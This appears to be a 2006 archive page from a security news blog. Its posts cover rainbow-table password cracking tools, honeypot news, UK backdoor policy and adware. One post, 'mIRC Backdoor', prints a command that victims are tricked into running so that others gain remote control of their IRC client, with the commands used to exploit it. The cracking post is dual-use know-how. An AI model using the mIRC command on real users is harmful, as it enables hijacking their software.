Darknet - The Darkside

Don`t Learn to HACK - Hack to LEARN. That`s our motto and we stick to it, we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on Twitter, Facebook or RSS for the latest updates.

27 February 2006 | 411,850 views

Password Cracking with Rainbowcrack and Rainbow Tables

Check Your Web Security with Acunetix

What is RainbowCrack & Rainbow Tables?

RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique.

In 1980 Martin Hellman described a cryptanalytic time-memory trade-off which reduces the time of cryptanalysis by using precalculated data stored in memory. This technique was improved by Rivest before 1982 with the introduction of distinguished points which drastically reduces the number of memory lookups during cryptanalysis. This improved technique has been studied extensively but no new optimisations have been published ever since.

You can find the official Rainbowcrack project here, where you can download the latest version of Rainbowcrack.

In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.

Basically these types of password crackers are working with pre-calculated hashes of ALL passwords available within a certain character space, be that a-z or a-zA-z or a-zA-Z0-9 etc.

These files are called Rainbow Tables.

You are trading speed for memory and disk space, the Rainbow Tables can be VERY large.

Be warned though, Rainbow tables can be defeated by salted hashes, if the hashes are not salted however and you have the correct table, a complex password can be cracked in a few minutes rather than a few weeks or months with traditional brute forcing techniques.

So where do I get these Rainbow Tables?

You can generate them yourself with RainbowCrack, this will take a long time, and a lot of diskspace.

Project Shmoo is offering downloads of popular Rainbow Tables via BitTorrent.

http://rainbowtables.shmoo.com/

If you wanted to, you could even buy the tables from http://www.rainbowtables.net/.

Or these guys, not free but cheap http://www.rainbowcrack-online.com/

Some free tables here http://wired.s6n.com/files/jathias/index.html

What software is available for use with Rainbow Tables?

There is of course the original RainbowCrack as mentioned above.

Then there is:

Ophcrack

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance.

Cain and Abel (newly added support for Rainbow Tables)

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Cain and Abel is personally my favourite fully featured password whacking tool, it also has a good packet sniffer, which grabs and decodes passwords and many methods for password cracking. The interface is decent too. I’ll write more on how to get the most out of Cain later.

L0phtcrack or LC5

LC5 is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.

Please note this is a COMMERCIAL product.

LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003

Thankfully there is a freeware alternative to LC5 in the form of LCP.

Other Resources

http://www.tmto.org/
http://www.loginrecovery.com/

Digg This Post



27 February 2006 | 7,568 views

Malware Honeypot Projects Merge – mwcollect and nepenthes

Looking to streamline the collection of malware samples, two of the biggest honeypot projects mwcollect and nepenthes have merged operations.

The two projects, which passively trap viruses, spyware and other forms of malicious software by emulating known vulnerabilities, will combine operations to develop a single malware collection tool, according to an announcement my mwcollect head developer Georg Wicherski.

The merger comes after a year of concurrent development that caused a lot of overlap and shared work, Wicherski said.

“Mwcollect.org will become a top-level community covering malware collection efforts, [and] nepenthes will become the official software used for malware collection and be part of mwcollect.org,” he said.

A new mwcollect.org meta-portal will be created to host information related to malware collection.

Source: Eweek


26 February 2006 | 5,557 views

Firefox Confuses UK Government Piracy Laws

The UK government stated:

If Mozilla permit the sale of copied versions of its software, it makes it virtually impossible for us, from a practical point of view, to enforce UK anti-piracy legislation

It seems they really don’t understand the whole open source thing do they? You can’t pirate open source software, you can however sell it however you like. Most companies just charge a nominal fee to cover the cost of the CD and the postage.

I can’t believe that your company would allow people to make money from something that you allow people to have free access to. Is this really the case?

The contact from Mozilla licensing actually responded back attempting to explain the situation.

I wrote back, politely explaining the principles of copyleft & that the software was free, both as in speech and as in price, and that people copying and redistributing it was a feature, not a bug. I said that selling verbatim copies of Firefox on physical media was absolutely fine with us, and we would like her to return any confiscated CDs and allow us to continue with our plan for world domination (or words to that effect).

Source: SlashdotTimes Online


25 February 2006 | 10,754 views

Free Prep Material for LPI Linux Certification (LPI 201 and 202)

Here’s a series of well written IBM Linux tutorials to help you learn Linux fundamentals and prepare for system administrator certification. The LPI prep tutorials help you prepare for the topics in LPI exam 201 and the topics in LPI exam 202.

You can find more about the certification at the Linux Professional Institute.

I’ve been meaning to take LPI 201 for quite sometime actually, it looks like a pretty solid foundation to Linux and I know most of it allready, so I should be able to do it without too much problem.

You can find the material at IBM:

Linux Professional Institute Exam Prep

The eight tutorials below help you prepare for the eight topics in LPI exam 201. Exam 201 is the first of two LPI intermediate-level system administrator exams. Both exam 201 and exam 202 are required for intermediate-level certification, or LPIC-2.

You do have to sign up, or just use Bugmenot, the bugmenot extension for Firefox is very useful ;)

To any budding hackers, yes it is recommended you have strong Linux skills.


24 February 2006 | 22,711 views

mIRC Backdoor

Well it’s not really a backdoor… but we can consider it one…

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC… all this backdoor stuff was really nothing more than a mIRC script that by it’s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is splited in 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” in which we write a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php


24 February 2006 | 6,894 views

UK Wants Backdoor in Next Version of Microsoft Windows

Yes that’s right, big brother wants a backdoor in your operating system even MORE of a reason to use Open Source alternatives that we can audit ourselves eh?

There has been talk of such things in the past, US government backdoors in common cryptography algorithms and now talks of backdoors in the most popular OS in the world.

Windows Vista is due to be rolled out later this year. Cambridge academic Ross Anderson told MPs it would mean more computer files being encrypted.

He urged the government to look at establishing “back door” ways of getting around encryptions.

The Home Office later told the BBC News website it is in talks with Microsoft.

Yes, it bothers me.

Professor Anderson said people were discussing the idea of making computer vendors ensure “back door keys” to encrypted material were made available.

The Home Office should enter talks with Microsoft now rather than when the system is introduced, he said.

He said encryption tools generally were either good or useless.

“If they are good, you either guess the password or give up,” he said.

Source: BBC News


24 February 2006 | 6,520 views

Passwords Passe at RSA

SAN JOSE, California — Identity theft and online bank fraud were the unofficial themes of the 2006 RSA Conference, a massive security confab where Bill Gates came to announce the imminent death of the password and vendors filled the exhibition halls with iPod giveaways and promises that their product could stop everything from spam and malware to hackers and typos.

Thanks to a California law known as SB 1386 that requires companies to disclose sensitive data leaks to California consumers, companies like ChoicePoint and shoe retailer DSW became poster children for corporate negligence last year after mishandling sensitive data.

As mentioned previously, Phishing is getting to be a big issue now, and password only measures are failing.

Perhaps the biggest change this year will be in online banking, as financial institutions move to comply with federal oversight agencies that are directing banks (.pdf) to secure their sites with more than just user logins and passwords.

These extra fraud profiling and authentication measures are necessary, according to Callas, since the threats on the internet have changed.

“Now we are not dealing with kids having fun,” Callas said. “We are dealing with criminals — the Russian mafia. And online banking risks are there if your bank offers it, even if you don’t use it.”

E-trade, for instance, already offers free RSA security tokens to its most active users. Those battery-powered devices work by using a using a seed number and the current time to cryptographically generate a secure one-time code to complement the normal user login and password.

Source: Wired News


23 February 2006 | 8,230 views

Google Desktop 3 Enterprise

Google Enterprise has reacted to privacy concerns and released Google Desktop 3 Enterprise.

It responds to security concerns allowing full administrator control, letting them use the standard group policy settings to completely disable features, including the controversial Search Across Computers feature which you can read about in our original article.

Google Enterprise’s Article


23 February 2006 | 10,000 views

The new Macbook Pro 15″ 2.0Ghz taken apart

OWC (Other World Computing) is a great site for buying parts for the mac. Their prices are quite cheap if you compare prices with stores in asia. Two days back (21/2/06) they got their hands on a Macbook Pro, which they received at 10:30pm and managed to take it all apart by 1.30pm. Pictures are posted here.

Check out the stuff they have on mac related items and accessories. They now also have upgrade parts for the new Macbook Pro.

For a first timer, taking apart a mac notebook is not an easy task. They are alot of ways you can damage your mac if you’re not careful.

For a complete step-by-step procedure on how to dis-assemble any mac, check out ifixit.com guide for a complete how-to complete with pictures and the number of screws you need to take out before you can actually take something apart on a mac.


23 February 2006 | 6,581 views

Advertisers may face public humiliation over adware

Companies could find themselves put up for public humiliation by the U.S. Federal Trade Commission if they continue to advertise through insidious ad-serving software.

Such a move might help in the battle against adware, FTC Commissioner Jon Leibowitz said Thursday at an event here hosted by the Anti-Spyware Coalition. Adware is software that displays pop-up ads on PCs, often after Internet searches.

Anti-spyware software is a requirement just like Anti-virus software. Common vulnerabilities in browsers make it very easy for malicious software to infect your machine through Internet Explorer for example.

“I think that could have a beneficial effect,” Leibowitz said in an interview. “In this context, maybe shaming a company on how they are spending money might inure to the benefit of consumer’s privacy.”

Viruses, spyware, trojans and adware are big problems now with solutions for all of them (firewalls and intrusion detection help massively of course).

The FTC would publicly announce and publish the name of a company that advertises using adware that installs itself surreptitiously on consumer PCs or using spyware, Leibowitz said. He would recommend publicly shaming advertisers to the other FTC commissioners if the adware problem doesn’t decrease, he said.

Source: News.com